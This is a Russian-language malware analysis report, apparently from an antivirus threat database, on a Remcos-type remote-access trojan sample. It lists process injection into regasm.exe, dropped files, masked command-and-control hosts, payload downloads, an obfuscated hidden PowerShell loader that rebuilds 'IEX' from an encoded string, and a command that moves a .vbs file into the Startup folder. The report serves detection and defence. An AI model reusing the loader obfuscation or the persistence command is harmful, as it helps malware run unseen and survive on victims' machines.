Техническая информация
Вредоносные функции
Внедряет код в
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
Завершает или пытается завершить
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\9e0c6c40-90ad-4f09-99e4-e87717944ae0\agiledotnetrt64.dll
- %APPDATA%\remcos\logs.dat
Сетевая активность
Подключается к
- '3.##9.18.57':80
- 'al######ade54321.ddns.net':8578
TCP
Запросы HTTP GET
- http://3.##9.18.57/WQ2.jpg
- http://3.##9.18.57/WQ1.jpg
UDP
- DNS ASK google.com
- DNS ASK al######ade54321.ddns.net
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $t0='DE5'.replace('D','I').replace('5','x');sal g $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c move "<SYSTEM32>\<Имя файла>.vbs" "<SYSTEM32>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $t0='DE5'.replace('D','I').replace('5','x');sal g $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101...
- '<SYSTEM32>\cmd.exe' /c move "<SYSTEM32>\<Имя файла>.vbs" "<SYSTEM32>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'
